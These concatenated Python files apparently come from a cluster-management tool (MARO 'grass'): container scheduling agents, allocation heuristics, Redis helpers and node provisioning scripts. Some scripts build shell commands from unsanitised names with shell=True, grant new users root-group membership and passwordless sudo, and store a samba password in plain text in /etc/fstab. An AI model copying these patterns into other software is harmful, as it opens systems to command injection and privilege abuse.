cpu = job_details["components"][component_type]["resources"]["cpu"]
memory = job_details["components"][component_type]["resources"]["memory"]
gpu = job_details["components"][component_type]["resources"]["gpu"]
# Parse environment parameters and labels.
environment_parameters = (
f"-e CLUSTER_ID={cluster_id} "
f"-e CLUSTER_NAME={cluster_name} "
f"-e NODE_ID={node_id} "
f"-e NODE_NAME={node_name} "
f"-e JOB_ID={job_id} "
f"-e JOB_NAME={job_name} "
f"-e COMPONENT_ID={component_id} "
f"-e COMPONENT_TYPE={component_type} "
f"-e COMPONENT_INDEX={component_index} "
f"-e CONTAINER_NAME={container_name} "
f"-e PYTHONUNBUFFERED=0 "
f"-e COMPONENT_NAME={component_name}"
)
labels = (
f"-l cluster_id={cluster_id} "
f"-l cluster_name={cluster_name} "
f"-l node_id={node_id} "
f"-l node_name={node_name} "
f"-l job_id={job_id} "
f"-l job_name={job_name} "
f"-l component_type={component_type} "
f"-l component_id={component_id} "
f"-l component_index={component_index} "
f"-l container_name={container_name} "
f"-l cpu={cpu} "
f"-l memory={memory} "
f"-l gpu={gpu}"
)
# Load command.
if job_details["components"][component_type]["resources"]["gpu"] != 0:
command = START_CONTAINER_WITH_GPU_COMMAND
else:
command = START_CONTAINER_COMMAND
command = command.format(
# cluster related.
admin_username=self._admin_username,
master_hostname=self._master_hostname,
node_hostname=node_details["hostname"],
fluentd_port=self._fluentd_port,
ssh_port=self._ssh_port,
# job related (user).
cpu=cpu,
memory=memory,
gpu=gpu,
mount_target=job_details["components"][component_type]["mount"]["target"],
command=job_details["components"][component_type]["command"],
image_name=job_details["components"][component_type]["image"],
# job related (system).
container_name=container_name,
job_id=job_id,
mount_source=f"~/.maro/clusters/{cluster_name}/data/",
environment_parameters=environment_parameters,
labels=labels
)
# Exec command.
logger.info(command)
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
)
if completed_process.returncode != 0:
raise AllocationFailed(completed_process.stderr)
class PendingJobAgent(multiprocessing.Process):
def __init__(self, cluster_details: dict, check_interval: int = 5):
super().__init__()
self._cluster_name = cluster_details["name"]
self._cluster_id = cluster_details["id"]
self._admin_username = cluster_details["user"]["admin_username"]
self._fluentd_port = cluster_details["master"]["fluentd"]["port"]
self._ssh_port = cluster_details["connection"]["ssh"]["port"]
self._master_hostname = cluster_details["master"]["hostname"]
self._redis = Redis(
host="localhost",
port=cluster_details["master"]["redis"]["port"],
charset="utf-8", decode_responses=True
)
self._check_interval = check_interval
self._pending_jobs = []
def run(self) -> None:
"""Start tracking pending job tickets.
Returns:
None.
"""
while True:
self._schedule_pending_job_tickets()
time.sleep(self._check_interval)
def _schedule_pending_job_tickets(self) -> None:
"""Schedule pending job tickets.
Returns:
None.
"""
# Get tickets.
self._pending_jobs = get_pending_job_tickets(
redis=self._redis,
cluster_name=self._cluster_name
)
# Iterate tickets.
for pending_job_name in self._pending_jobs:
# Get details.
job_details = get_job_details(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=pending_job_name
)
# Get resources info.
free_resources = ResourceManagementExecutor.get_free_resources(
redis=self._redis,
cluster_name=self._cluster_name
)
required_resources = ResourceManagementExecutor.get_required_resources(job_details=job_details)
# Do allocation and start job.
try:
allocation_plan = ResourceManagementExecutor.get_allocation_plan(
allocation_details=job_details["allocation"],
required_resources=required_resources,
free_resources=free_resources
)
for container_name, node_name in allocation_plan.items():
node_details = get_node_details(
redis=self._redis,
cluster_name=self._cluster_name,
node_name=node_name
)
self._start_container(
container_name=container_name,
node_details=node_details,
job_details=job_details
)
remove_pending_job_ticket(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=pending_job_name
)
except AllocationFailed as e:
logger.warning(f"Allocation failed with {e}")
except StartContainerFailed as e:
remove_pending_job_ticket(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=pending_job_name
)
logger.warning(f"Start container failed with {e}")
def _start_container(self, container_name: str, node_details: dict, job_details: dict):
"""Start container.
Args:
container_name: Name of the container.
node_details: Details of the node.
job_details: Details of the job.
Returns:
None.
"""
# Get mapping.
component_id_to_component_type = JobExecutor.get_component_id_to_component_type(job_details=job_details)
# Parse params.
cluster_name = self._cluster_name
cluster_id = self._cluster_id
node_id = node_details["id"]
node_name = node_details["name"]
job_name = job_details["name"]
job_id = job_details["id"]
component_id = container_name.split("-")[1]
component_index = container_name.split("-")[2]
component_type = component_id_to_component_type[component_id]
cpu = job_details["components"][component_type]["resources"]["cpu"]
memory = job_details["components"][component_type]["resources"]["memory"]
gpu = job_details["components"][component_type]["resources"]["gpu"]
# Parse environment parameters and labels.
environment_parameters = (
f"-e CLUSTER_ID={cluster_id} "
f"-e CLUSTER_NAME={cluster_name} "
f"-e NODE_ID={node_id} "
f"-e NODE_NAME={node_name} "
f"-e JOB_ID={job_id} "
f"-e JOB_NAME={job_name} "
f"-e COMPONENT_ID={component_id} "
f"-e COMPONENT_TYPE={component_type} "
f"-e COMPONENT_INDEX={component_index} "
f"-e CONTAINER_NAME={container_name} "
f"-e PYTHONUNBUFFERED=0"
)
labels = (
f"-l cluster_id={cluster_id} "
f"-l cluster_name={cluster_name} "
f"-l node_id={node_id} "
f"-l node_name={node_name} "
f"-l job_id={job_id} "
f"-l job_name={job_name} "
f"-l component_type={component_type} "
f"-l component_id={component_id} "
f"-l component_index={component_index} "
f"-l container_name={container_name} "
f"-l cpu={cpu} "
f"-l memory={memory} "
f"-l gpu={gpu}"
)
# Load command.
if job_details["components"][component_type]["resources"]["gpu"] != 0:
command = START_CONTAINER_WITH_GPU_COMMAND
else:
command = START_CONTAINER_COMMAND
command = command.format(
# cluster related.
admin_username=self._admin_username,
master_hostname=self._master_hostname,
node_hostname=node_details["hostname"],
fluentd_port=self._fluentd_port,
ssh_port=self._ssh_port,
# job related (user).
cpu=cpu,
memory=memory,
gpu=gpu,
mount_target=job_details["components"][component_type]["mount"]["target"],
command=job_details["components"][component_type]["command"],
image_name=job_details["components"][component_type]["image"],
# job related (system).
container_name=container_name,
job_id=job_id,
mount_source=f"~/.maro/clusters/{cluster_name}/data/",
environment_parameters=environment_parameters,
labels=labels
)
# Exec command.
logger.info(command)
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
)
if completed_process.returncode != 0:
raise AllocationFailed(completed_process.stderr)
class KilledJobAgent(multiprocessing.Process):
def __init__(self, cluster_details: dict, check_interval: int = 5):
super().__init__()
self._cluster_name = cluster_details["name"]
self._cluster_id = cluster_details["id"]
self._admin_username = cluster_details["user"]["admin_username"]
self._ssh_port = cluster_details["connection"]["ssh"]["port"]
self._redis = Redis(
host="localhost",
port=cluster_details["master"]["redis"]["port"],
charset="utf-8", decode_responses=True
)
self._check_interval = check_interval
self._killed_job_tickets = []
def run(self) -> None:
"""Start tracking killed job tickets.
Returns:
None.
"""
while True:
self._schedule_killed_job_tickets()
time.sleep(self._check_interval)
def _schedule_killed_job_tickets(self):
"""Schedule killed job tickets.
Returns:
None.
"""
# Get tickets.
self._killed_job_tickets = get_killed_job_tickets(
redis=self._redis,
cluster_name=self._cluster_name
)
# Iterate tickets.
for job_name in self._killed_job_tickets:
# Get details.
job_details = get_job_details(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=job_name
)
if job_details is not None:
# Kill job.
self._kill_job(job_details=job_details)
else:
logger.warning(f"{job_name} not exists, cannot be stopped")
# Remove killed job ticket.
remove_killed_job_ticket(
redis=self._redis,
cluster_name=self._cluster_name,
job_name=job_name
)
def _kill_job(self, job_details: dict) -> None:
"""Kill job and stop containers.
Args:
job_details (dict): Details of the job.
Returns:
None.
"""
# Get params.
job_id = job_details["id"]
# Delete mapping if fault tolerance is activated.
delete_rejoin_container_name_to_component_name(
redis=self._redis,
job_id=job_id
)
# Load details and vars.
nodes_details = get_nodes_details(
redis=self._redis,
cluster_name=self._cluster_name
)
# Delete containers.
for node_name, node_details in nodes_details.items():
# Load details.
container_details = node_details["containers"]
node_hostname = node_details["hostname"]
# Filter containers.
removable_containers = []
for container_name in container_details:
if container_name.startswith(job_id):
removable_containers.append(container_name)
# Stop containers.
if len(removable_containers) > 0:
command = STOP_CONTAINER_COMMAND.format(
admin_username=self._admin_username,
node_hostname=node_hostname,
containers=" ".join(removable_containers),
ssh_port=self._ssh_port
)
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
encoding="utf8"
)
if completed_process.returncode != 0:
logger.error(completed_process.stderr)
logger.info(command)
class ResourceManagementExecutor:
@staticmethod
def get_allocation_plan(allocation_details: dict, required_resources: list, free_resources: list) -> dict:
"""Get container allocation mapping.
Args:
allocation_details (dict): Details of allocation config.
required_resources (list): List of ContainerResource.
free_resources (list): List of NodeResource.
Returns:
dict: container_name to node_name mapping.
"""
if allocation_details["mode"] == "single-metric-balanced":
return ResourceManagementExecutor.get_single_metric_balanced_allocation_plan(
allocation_details=allocation_details,
required_resources=required_resources,
free_resources=free_resources
)
elif allocation_details["mode"] == "single-metric-compacted":
return ResourceManagementExecutor.get_single_metric_compacted_allocation_plan(
allocation_details=allocation_details,
required_resources=required_resources,
free_resources=free_resources
)
else:
raise AllocationFailed("Invalid allocation mode")
@staticmethod
def get_single_metric_compacted_allocation_plan(
allocation_details: dict,
required_resources: list, free_resources: list
) -> dict:
"""Get single_metric_compacted allocation plan.
The strategy uses a specific metric as the priority,
then use a greedy approach to match the container to the available node
with the smallest remaining free resource.
Args:
allocation_details (dict): Details of allocation config.
required_resources (list): List of ContainerResource.
free_resources (list): List of NodeResource.
Returns:
dict[str, str]: container_name to node_name mapping.
"""
# Init params.
allocation_plan = {}
if "metric" not in allocation_details or allocation_details["metric"].lower() not in AVAILABLE_METRICS:
raise AllocationFailed("Invalid allocation parameter: metric")
metric = allocation_details["metric"].lower()
# Init resources PQ.
required_resources_pq = []
for required_resource in required_resources:
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
free_resources_pq = []
for free_resource in free_resources:
heapq.heappush(
free_resources_pq,
(getattr(free_resource, metric), free_resource)
)
# Get allocation.
while len(required_resources_pq) > 0:
is_allocated = False
# Get vars.
required_resource = heapq.heappop(required_resources_pq)[1]
free_resource = None
not_usable_free_resources = []
while len(free_resources_pq) > 0:
free_resource = heapq.heappop(free_resources_pq)[1]
if free_resource >= required_resource:
is_allocated = True
break
else:
not_usable_free_resources.append(free_resource)
# Do allocation or return error.
if is_allocated:
allocation_plan[required_resource.container_name] = free_resource.node_name
free_resource.cpu -= required_resource.cpu
free_resource.memory -= required_resource.memory
free_resource.gpu -= required_resource.gpu
heapq.heappush(
free_resources_pq,
(getattr(free_resource, metric), free_resource)
)
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
else:
# add previous resources back, to do printing.
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
logger.warning(allocation_plan)
logger.warning(required_resources_pq)
logger.warning(free_resources_pq)
raise AllocationFailed("Unable to allocate, Abort")
logger.info(required_resources)
logger.info(free_resources)
return allocation_plan
@staticmethod
def get_single_metric_balanced_allocation_plan(
allocation_details: dict,
required_resources: list, free_resources: list
) -> dict:
"""Get single_metric_balanced allocation plan.
The strategy uses a specific metric as the priority,
then use a greedy approach to match the container to the available node
with the largest remaining free resource.
Args:
allocation_details (dict): Details of allocation config.
required_resources (list): List of ContainerResource.
free_resources (list): List of NodeResource.
Returns:
dict[str, str]: container_name to node_name mapping.
"""
# Init params.
allocation_plan = {}
if "metric" not in allocation_details or allocation_details["metric"].lower() not in AVAILABLE_METRICS:
raise AllocationFailed("Invalid allocation parameter: metric")
metric = allocation_details["metric"].lower()
# Init resources PQ.
required_resources_pq = []
for required_resource in required_resources:
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
free_resources_pq = []
for free_resource in free_resources:
heapq.heappush(
free_resources_pq,
(-getattr(free_resource, metric), free_resource)
)
# Get allocation.
while len(required_resources_pq) > 0:
# Get list, not tuple.
required_resource = heapq.heappop(required_resources_pq)[1]
not_usable_free_resources = []
is_allocated = False
free_resource = None
while len(free_resources_pq) > 0:
# Get list, not tuple.
free_resource = heapq.heappop(free_resources_pq)[1]
if free_resource >= required_resource:
is_allocated = True
break
else:
not_usable_free_resources.append(free_resource)
# Do allocation or return error.
if is_allocated:
allocation_plan[required_resource.container_name] = free_resource.node_name
free_resource.cpu -= required_resource.cpu
free_resource.memory -= required_resource.memory
free_resource.gpu -= required_resource.gpu
heapq.heappush(
free_resources_pq,
(-getattr(free_resource, metric), free_resource)
)
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(-getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
else:
# add previous resources back, to do printing.
for not_usable_free_resource in not_usable_free_resources:
heapq.heappush(
free_resources_pq,
(-getattr(not_usable_free_resource, metric), not_usable_free_resource)
)
heapq.heappush(
required_resources_pq,
(-getattr(required_resource, metric), required_resource)
)
logger.warning(allocation_plan)
logger.warning(required_resources_pq)
logger.warning(free_resources_pq)
raise AllocationFailed("Unable to allocate, Abort")
logger.info(required_resources)
logger.info(free_resources)
return allocation_plan
@staticmethod
def get_free_resources(redis: Redis, cluster_name: str) -> list:
"""Get free resources of nodes in cluster.
Args:
redis (Redis): Redis Client of current cluster.
cluster_name (str): Name of the cluster.
Returns:
list: List of NodeResource.
"""
# Load details.
nodes_details = get_nodes_details(
redis=redis,
cluster_name=cluster_name
)
# Get free resources.
free_resources_list = []
for node_name, node_details in nodes_details.items():
target_free_cpu = node_details["resources"]["target_free_cpu"]
target_free_memory = node_details["resources"]["target_free_memory"]
target_free_gpu = node_details["resources"]["target_free_gpu"]
if node_details["state"] == "Running":
free_resources_list.append(
NodeResource(
node_name=node_name,
cpu=target_free_cpu,
memory=target_free_memory,
gpu=target_free_gpu
)
)
return free_resources_list
@staticmethod
def get_required_resources(job_details: dict) -> list:
"""Get required resources from job_details.
Args:
job_details: Details of jobs.
Returns:
list: List of ContainerResource.
"""
# Load configs.
components_details = job_details["components"]
job_id = job_details["id"]
# Get required resources.
resources_list = []
for component_type, component_details in components_details.items():
component_id = component_details["id"]
component_num = component_details["num"]
required_cpu = component_details["resources"]["cpu"]
required_memory = int(component_details["resources"]["memory"].replace("m", ""))
required_gpu = component_details["resources"]["gpu"]
for i in range(component_num):
resources_list.append(
ContainerResource(
container_name=ResourceManagementExecutor.build_container_name(job_id, component_id, i),
cpu=required_cpu,
memory=required_memory,
gpu=required_gpu,
)
)
return resources_list
@staticmethod
def build_container_name(job_id: str, component_id: str, component_index: int) -> str:
"""Build the container name with job-related params.
Ref: The container name must be from 1 to 255 characters long.
Args:
job_id: The Id of the job.
component_id: The Id of the component.
component_index: The index of the current component.
Returns:
str: Name of the container.
"""
return f"{job_id}-{component_id}-{component_index}-{uuid.uuid4().hex[:6]}"
class JobExecutor:
@staticmethod
def get_component_id_to_component_type(job_details: dict) -> dict:
"""Get component_id_to_component_type mapping from job_details
Args:
job_details: Details of jobs.
Returns:
dict[str, str]: component_id_to_component_type mapping.
"""
# Load details.
components_details = job_details["components"]
# Get component_id_to_type.
component_id_to_component_type = {}
for component_type, component_details in components_details.items():
component_id_to_component_type[component_details["id"]] = component_type
return component_id_to_component_type
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG,
format="[%(levelname)-7s] - %(asctime)s - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S")
with open(os.path.expanduser("~/.maro-local/agents/master_agent.config"), "r") as fr:
master_agent_config = json.load(fr)
master_agent = MasterAgent(
cluster_name=master_agent_config["cluster_name"]
)
master_agent.start()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
import yaml
from redis import Redis
"""Load from files"""
def load_cluster_details(cluster_name: str) -> dict:
with open(os.path.expanduser(f"~/.maro/clusters/{cluster_name}/details.yml"), 'r') as fr:
cluster_details = yaml.safe_load(fr)
return cluster_details
def load_job_details(cluster_name: str, job_name: str) -> dict:
with open(os.path.expanduser(f"~/.maro/clusters/{cluster_name}/jobs/{job_name}/details.yml"), 'r') as fr:
job_details = yaml.safe_load(fr)
return job_details
"""Node details"""
def get_node_details(redis: Redis, cluster_name: str, node_name: str) -> dict:
return json.loads(
redis.hget(
f"{cluster_name}:node_details",
node_name
)
)
def get_nodes_details(redis: Redis, cluster_name: str) -> dict:
nodes_details = redis.hgetall(
f"{cluster_name}:node_details"
)
for node_name, node_details in nodes_details.items():
nodes_details[node_name] = json.loads(node_details)
return nodes_details
def set_node_details(redis: Redis, cluster_name: str, node_name: str, node_details: dict) -> None:
redis.hset(
f"{cluster_name}:node_details",
node_name,
json.dumps(node_details)
)
"""Job details"""
def get_job_details(redis: Redis, cluster_name: str, job_name: str) -> dict:
return_str = redis.hget(
f"{cluster_name}:job_details",
job_name
)
return json.loads(return_str) if return_str is not None else None
def get_jobs_details(redis: Redis, cluster_name: str) -> dict:
jobs_details = redis.hgetall(
f"{cluster_name}:job_details",
)
for job_name, job_details in jobs_details.items():
jobs_details[job_name] = json.loads(job_details)
return jobs_details
def set_job_details(redis: Redis, cluster_name: str, job_name: str, job_details: dict) -> None:
redis.hset(
f"{cluster_name}:job_details",
job_name,
json.dumps(job_details)
)
"""Containers details"""
def get_containers_details(redis: Redis, cluster_name: str) -> dict:
containers_details = redis.hgetall(
f"{cluster_name}:container_details",
)
for container_name, container_details in containers_details.items():
containers_details[container_name] = json.loads(container_details)
return containers_details
def set_containers_details(redis: Redis, cluster_name: str, containers_details: dict) -> None:
redis.delete(f"{cluster_name}:container_details")
if len(containers_details) == 0:
return
else:
for container_name, container_details in containers_details.items():
containers_details[container_name] = json.dumps(container_details)
redis.hmset(
f"{cluster_name}:container_details",
containers_details
)
def set_container_details(redis: Redis, cluster_name: str, container_name: str, container_details: dict) -> None:
redis.hset(
f"{cluster_name}:container_details",
container_name,
container_details
)
"""Pending job ticket"""
def get_pending_job_tickets(redis: Redis, cluster_name: str):
return redis.lrange(
f"{cluster_name}:pending_job_tickets",
0,
-1
)
def remove_pending_job_ticket(redis: Redis, cluster_name: str, job_name: str):
redis.lrem(
f"{cluster_name}:pending_job_tickets",
0,
job_name
)
"""Killed job ticket"""
def get_killed_job_tickets(redis: Redis, cluster_name: str):
return redis.lrange(
f"{cluster_name}:killed_job_tickets",
0,
-1
)
def remove_killed_job_ticket(redis: Redis, cluster_name: str, job_name: str):
redis.lrem(
f"{cluster_name}:killed_job_tickets",
0,
job_name
)
"""Fault tolerance related"""
def get_rejoin_component_name_to_container_name(redis: Redis, job_id: str) -> dict:
return redis.hgetall(
f"job:{job_id}:rejoin_component_name_to_container_name"
)
def get_rejoin_container_name_to_component_name(redis: Redis, job_id: str) -> dict:
component_name_to_container_name = get_rejoin_component_name_to_container_name(
redis=redis,
job_id=job_id
)
return {v: k for k, v in component_name_to_container_name.items()}
def delete_rejoin_container_name_to_component_name(redis: Redis, job_id: str) -> None:
redis.delete(
f"job:{job_id}:rejoin_component_name_to_container_name"
)
def get_job_runtime_details(redis: Redis, job_id: str) -> dict:
return redis.hgetall(
f"job:{job_id}:runtime_details"
)
def get_rejoin_component_restart_times(redis, job_id: str, component_id: str) -> int:
restart_times = redis.hget(
f"job:{job_id}:component_id_to_restart_times",
component_id
)
return 0 if restart_times is None else int(restart_times)
def incr_rejoin_component_restart_times(redis, job_id: str, component_id: str) -> None:
redis.hincrby(
f"job:{job_id}:component_id_to_restart_times",
component_id,
1
)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
import os
import subprocess
import sys
import platform
"""
This file is used for creating a user account with SSH public key settings on node.
Example:
sudo python3 create_user.py {account name} "{RSA public key}"
"""
def run_command(command: str) -> str:
if platform.system() == "Windows":
command = f"powershell.exe -Command \"{command}\""
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if completed_process.returncode != 0:
return completed_process.stderr
return completed_process.stdout
def create_user(user_name: str) -> None:
try:
run_command("sudo useradd -m " + user_name)
run_command("sudo usermod -G root " + user_name)
ssh_path = f"/home/{user_name}/.ssh/"
if not os.path.exists(ssh_path):
os.mkdir(ssh_path)
except:
print("Failed to add user.")
sys.exit(1)
def add_pub_key(user_name: str, pub_key: str) -> None:
ssh_path = f"/home/{user_name}/.ssh/"
authorized_keys_path = os.path.join(ssh_path, "authorized_keys")
with open(authorized_keys_path, "w+") as pub_key_file:
lines = ["\r\n", pub_key, "\r\n"]
pub_key_file.writelines(lines)
pub_key_file.close()
# Please don't test on your own macOS or Linux.
# Sudoers file doesn't accept "\r\n", but only "\r" seems OK.
def add_sudoers(user_name: str) -> None:
account_line = f"{user_name} ALL=(ALL:ALL) NOPASSWD:ALL"
with open("/etc/sudoers", "a+") as sudoers_file:
lines = [account_line]
sudoers_file.writelines(lines)
sudoers_file.close()
def check_sudoers(user_name: str) -> bool:
account_line = f"{user_name} ALL=(ALL:ALL) NOPASSWD:ALL"
with open("/etc/sudoers", "r") as sudoers_file:
lines = sudoers_file.readlines()
sudoers_file.close()
for line in lines:
if account_line in line:
return True
return False
def user_already_exists(user_name: str) -> bool:
user_path = "/home/" + user_name
if os.path.exists(user_path):
return True
return False
if __name__ == "__main__":
# Load args
parser = argparse.ArgumentParser()
parser.add_argument("user_name")
parser.add_argument("pub_key")
args = parser.parse_args()
if not user_already_exists(args.user_name):
# create user
create_user(args.user_name)
user_path = "/home/" + args.user_name
run_command(f"sudo ssh-keygen -t rsa -N '' -f {user_path}/.ssh/id_rsa")
if not check_sudoers(args.user_name):
add_sudoers(args.user_name)
# set pub key
add_pub_key(args.user_name, args.pub_key)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
import crypt
import getpass
import os
import subprocess
import sys
import platform
"""
This file is used for deleting a specified account and related files on node.
Example:
sudo python3 delete_user.py {account name}
"""
def run_command(command: str) -> str:
if platform.system() == "Windows":
command = f"powershell.exe -Command \"{command}\""
completed_process = subprocess.run(
command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if completed_process.returncode != 0:
return completed_process.stderr
return completed_process.stdout
def delete_user(user_name: str):
try:
user_path = "/home/" + user_name
run_command("sudo userdel -f " + user_name)
if os.path.exists(user_path):
run_command("sudo rm -rf " + user_path)
except:
print("Failed to delete user.")
sys.exit(1)
def user_already_exists(user_name: str) -> bool:
user_path = "/home/" + user_name
if os.path.exists(user_path):
return True
return False
if __name__ == "__main__":
# Load args
parser = argparse.ArgumentParser()
parser.add_argument("user_name")
args = parser.parse_args()
if user_already_exists(args.user_name):
# delete user
delete_user(args.user_name)
print(f"The account {args.user_name} has been deleted.")
else:
print(f"The account {args.user_name} does not exists.")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import subprocess
import sys
INIT_COMMAND = """\
echo 'Step 1/{steps}: Install nvidia driver'
sudo apt-get install linux-headers-$(uname -r)
distribution=$(. /etc/os-release;echo $ID$VERSION_ID | tr -d '.')
wget https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/cuda-$distribution.pin
sudo mv cuda-$distribution.pin /etc/apt/preferences.d/cuda-repository-pin-600
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/7fa2af80.pub
echo "deb http://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64 /" | \
sudo tee /etc/apt/sources.list.d/cuda.list
sudo apt-get update
sudo apt-get -y install cuda-drivers
echo 'Step 2/{steps}: Install docker'
sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo apt-key fingerprint 0EBFCD88
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt-get update
sudo apt-get install -y docker-ce docker-ce-cli containerd.io
echo 'Step 3/{steps}: Install nvidia container toolkit'
distribution=$(. /etc/os-release;echo $ID$VERSION_ID) \
&& curl -s -L https://nvidia.github.io/nvidia-docker/gpgkey | sudo apt-key add - \
&& curl -s -L https://nvidia.github.io/nvidia-docker/$distribution/nvidia-docker.list | \
sudo tee /etc/apt/sources.list.d/nvidia-docker.list
sudo apt-get update
sudo apt-get install -y nvidia-docker2
sudo systemctl restart docker
echo 'Step 4/{steps}: Install python3 and related packages'
sudo apt update
sudo apt install -y python3-pip
pip3 install redis
echo 'Step 5/{steps}: Delete outdated files'
rm ~/init_build_node_image_vm.py
"""
if __name__ == "__main__":
# Exec command
command = INIT_COMMAND.format(steps=5)
process = subprocess.Popen(
command,
executable="/bin/bash",
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
)
while True:
nextline = process.stdout.readline()
if nextline == "" and process.poll() is not None:
break
sys.stdout.write(nextline)
sys.stdout.flush()
stdout, stderr = process.communicate()
if stderr:
sys.stderr.write(stderr.strip("\n"))
sys.stdout.write(stdout.strip("\n"))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
import os
import subprocess
import sys
import yaml
INIT_COMMAND = '''\
# create group 'docker' and add admin user
sudo groupadd docker
sudo gpasswd -a {admin_username} docker
# setup samba mount
echo 'Step 1/{steps}: Setup samba mount'
mkdir -p {maro_path}
sudo mount -t cifs -o username={admin_username},password={samba_password} //{master_hostname}/sambashare {maro_path}
echo '//{master_hostname}/sambashare {maro_path} cifs username={admin_username},password={samba_password} 0 0' | \
sudo tee -a /etc/fstab
# load master public key
echo 'Step 2/{steps}: Load master public key'
echo '{master_public_key}' >> ~/.ssh/authorized_keys
# delete outdated files
echo 'Step 3/{steps}: Delete outdated files'
rm ~/details.yml
rm ~/init_node.py
echo "Finish node initialization"
'''
if __name__ == "__main__":
# Load args
parser = argparse.ArgumentParser()
parser.add_argument("cluster_name")
parser.add_argument("node_name")
args = parser.parse_args()
# Load details
with open(os.path.expanduser("~/details.yml"), "r") as fr:
cluster_details = yaml.safe_load(fr)
master_hostname = cluster_details["master"]["hostname"]
master_public_key = cluster_details["master"]["public_key"]
admin_username = cluster_details["user"]["admin_username"]
samba_password = cluster_details["master"]["samba"]["password"]
# Load command
command = INIT_COMMAND.format(
admin_username=admin_username,
maro_path=os.path.expanduser("~/.maro"),
samba_password=samba_password,
master_hostname=master_hostname,
master_public_key=master_public_key,
steps=3
)
# Exec command
process = subprocess.Popen(
command,
executable="/bin/bash",
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf8"
)
while True:
nextline = process.stdout.readline()
if nextline == "" and process.poll() is not None:
break
sys.stdout.write(nextline)
sys.stdout.flush()
stdout, stderr = process.communicate()
if stderr:
sys.stderr.write(stderr.strip("\n"))
sys.stdout.write(stdout.strip("\n"))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import yaml
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.grass.executors.grass_on_premises_executor import GrassOnPremisesExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError, FileOperationError
@check_details_validity
@lock
def scale_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] == "grass/azure":
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.scale_node(replicas=replicas, node_size=node_size)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
@check_details_validity
@lock
def start_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] == "grass/azure":
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.start_node(replicas=replicas, node_size=node_size)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
@check_details_validity
@lock
def stop_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] == "grass/azure":
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.stop_node(replicas=replicas, node_size=node_size)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
@check_details_validity
@lock
def list_node(cluster_name: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] in ["grass/azure", "grass/on-premises"]:
executor = GrassAzureExecutor(cluster_name=cluster_name)
executor.list_node()
def node_join(node_join_path: str, **kwargs):
try:
with open(node_join_path, "r") as fr:
node_join_info = yaml.safe_load(fr)
fr.close()
if node_join_info["mode"] != "grass/on-premises":
raise BadRequestError(
f"Node join cluster interrupted: Invalid mode: {node_join_info['mode']}")
executor = GrassOnPremisesExecutor(node_join_info["cluster"])
executor.node_join_cluster(node_join_info)
except FileNotFoundError:
raise FileOperationError("Invalid template file path.")
@check_details_validity
@lock
def node_leave(cluster_name: str, node_name: str, **kwargs):
cluster_details = load_cluster_details(cluster_name)
if cluster_details["mode"] != "grass/on-premises":
raise BadRequestError("Node join cluster interrupted: Invalid mode.")
executor = GrassOnPremisesExecutor(cluster_name)
executor.node_leave_cluster(node_name)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
